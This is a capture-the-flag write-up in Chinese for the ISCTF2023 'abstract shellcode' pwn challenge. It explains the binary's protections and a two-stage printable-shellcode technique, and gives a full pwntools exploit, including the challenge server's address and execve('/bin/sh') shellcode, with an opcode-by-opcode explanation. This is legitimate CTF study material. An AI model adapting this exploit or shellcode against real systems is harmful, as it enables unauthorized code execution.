isctf2023 - abstract shellcode

RocketDev

确实挺抽象

文件分析

NX off, PIE on, Canary on, RELRO full
ghidra分析为64位程序

解题思路

开始时读入一个ye/no,就可以开始输入shellcode了,一开始以为有16字节的限制, 还把字符范围限制在了'O'~'_'之间,但是实际动调时发现还有1个任意字符的机会

要想执行system,这么一些字节肯定不够,那么可以参照newstarctf里的shellcode_revenge, 先执行read,再执行,那么这最后的一个字节可以做什么呢,发现'\xc3'可以实现跳转, 这时候才意识过来,之前给的两个字符,是用来放syscall('\x0f\x05')的, 那么只要构造一个read系统调用,再读入execve的shellcode并执行就可以拿到shell

下文有shellcode的详细解释

read的第三个参数count有最大值SSIZE_MAX(0x7ffff000 on Linux), 超过这个值是依赖于实现的,当我随便找了一个超大数字时,我用的Arch Linux可以成功read, Ubuntu就不行,害得我一开始连远端就寄,还得开虚拟机试试(毕竟是内核存在差别)

EXPLOIT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from pwn import *
context.arch = 'amd64'

def payload(lo):
global sh
if lo:
sh = process('abstractshellcode')
else:
sh = remote('43.249.195.138', 21851)
if lo & 0b10:
gdb.attach(sh, gdbscript='b *$rebase(0x14aa)')

# payload 1, place syscall on stack
sh.send(b'\x0f\x05')

# payload 2, control registers and return to syscall
sh.send(b'P^WXOSZYY[YQYQYS\xc3')

code = '''
mov rbx, 0x68732f6e69622f
push rbx
push rsp
pop rdi
xor esi, esi
xor edx, edx
push 0x3b
pop rax
syscall
'''
shc = asm(code)

# payload 3, execute /bin/sh
sh.sendline(b'0'*(0x52 - 0x20) + shc)

sh.interactive()

以下是对第二条payload的解释

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
push rax ; P
pop rsi ; ^ 读取到当前字符串开始处
push rdi ; W
pop rax ; X 复制0给rax
push r11 ; OS (O: REX:WRXB -> 修饰rbx为r11)
pop rdx ; Z 复制0x246给count参数
pop rcx ; Y
pop rcx ; Y
pop rbx ; [ 先把syscall字符串所在地址读到rbx中
pop rcx ; Y padding * 5
push rcx ; Q
pop rcx ; Y
push rcx ; Q
pop rcx ; Y
push rbx ; S 还原rbx的地址到rsp上
ret ; \xc3 ; aka pop rip: 程序跳转到rbx的地址上

参考

printable shellcode

Done.

  • 标题: isctf2023 - abstract shellcode
  • 作者: RocketDev
  • 创建于 : 2023-12-02 20:00:00
  • 更新于 : 2024-08-26 17:18:00
  • 链接: https://rocketma.dev/2023/12/02/abstract_shellcode/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
isctf2023 - abstract shellcode